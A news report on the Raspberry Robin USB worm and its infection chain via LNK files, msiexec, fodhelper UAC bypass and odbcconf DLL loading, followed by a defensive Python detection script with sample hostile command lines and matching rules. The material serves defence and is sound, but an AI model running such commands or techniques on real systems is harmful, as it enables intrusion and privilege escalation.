In short: Researchers have discovered a relatively new worm that infects Windows PCs through a compromised external hard drive. Although they have been tracking it for several months and know how it works, they are not sure what its end goal is. Apart from the insidious way it operates, its later-stage tasks are still unknown.

Analysts at Red Canary have disclosed a cluster of malicious activity involving a worm distributed via external USB drives. The malware is also known as the "QNAP worm," which cyber intelligence company Sekoia described back in November 2021. Red Canary has found it in the networks of some of its customers in the technology and manufacturing sectors and has been tracking it since September under the codename Raspberry Robin.

Raspberry Robin spreads when users plug an infected USB drive into their computer. The worm, disguised as an LNK file, then uses Windows cmd.exe to launch the malicious file. It then uses the standard Microsoft installer (msiexec.exe) to connect to command and control (C2) servers, typically vulnerable QNAP devices. It then uses Tor exit nodes to cover its tracks.

Red Canary suspects that Raspberry Robin establishes persistence by installing a malicious DLL file from the C2 servers. The malware then launches the DLL using two utilities included with Windows: fodhelper (Windows settings manager) and odbcconf (ODBC driver configuration tool). The former bypasses User Account Control, while the latter executes and configures the DLL.

However, the researchers acknowledge that this is just a working hypothesis. They don't know exactly what the DLLs do, nor have they figured out how the worm gets onto USB sticks.

“First of all, we don’t know how or where Raspberry Robin infects external drives to perpetuate its activity, although it’s likely that this happens offline or otherwise outside of our line of sight,” Red Canary said. “We also don’t know why Raspberry Robin installs a malicious DLL.”

It is also unclear what the ultimate goal of the QNAP worm is. Beyond how it works, the researchers have not seen any "late-stage activity" that could benefit its operators.
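The execution chain described above (cmd.exe launching msiexec.exe against a remote server, then fodhelper and odbcconf loading a DLL) can be hunted for in process-creation telemetry. The following is an added example, not code from Red Canary or Sekoia; the event field names, rule names and sample events are assumptions constructed for illustration.

```python
import re

# Heuristics derived from the chain described in the article. The event fields
# (host, parent, image, cmdline) are assumed, not a specific EDR schema.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
DLL_RE = re.compile(r"\.dll\b", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the rule names matched by one process-creation event."""
    image = basename(event.get("image", ""))
    parent = basename(event.get("parent", ""))
    cmdline = event.get("cmdline", "")
    hits = []
    # msiexec.exe fetching a package from a URL instead of a local file
    if image == "msiexec.exe" and URL_RE.search(cmdline):
        hits.append("msiexec_remote_package")
        if parent == "cmd.exe":
            hits.append("cmd_spawns_msiexec_remote")
    # fodhelper.exe rarely has child processes; a child suggests a UAC bypass
    if parent == "fodhelper.exe":
        hits.append("fodhelper_child_process")
    # odbcconf.exe being pointed at a DLL
    if image == "odbcconf.exe" and DLL_RE.search(cmdline):
        hits.append("odbcconf_loads_dll")
    return hits

def scan(events):
    """Map host -> ordered list of (rule, cmdline) for hosts with any hit."""
    findings = {}
    for ev in events:
        for rule in classify(ev):
            findings.setdefault(ev["host"], []).append((rule, ev["cmdline"]))
    return findings

# Constructed sample events (not real telemetry); example.invalid is a placeholder.
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i http://example.invalid/placeholder"},
    {"host": "ws-01", "parent": r"C:\Windows\System32\fodhelper.exe",
     "image": r"C:\Windows\System32\odbcconf.exe",
     "cmdline": r"odbcconf.exe /a {regsvr C:\Users\Public\placeholder.dll}"},
    {"host": "ws-02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Temp\setup.msi"},
]

if __name__ == "__main__":
    for host, hits in scan(SAMPLE_EVENTS).items():
        print(host, [rule for rule, _ in hits])
```

Each rule on its own can match legitimate administration, so the useful signal is several rules firing on the same host in a short window.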

Image credit: Red Canary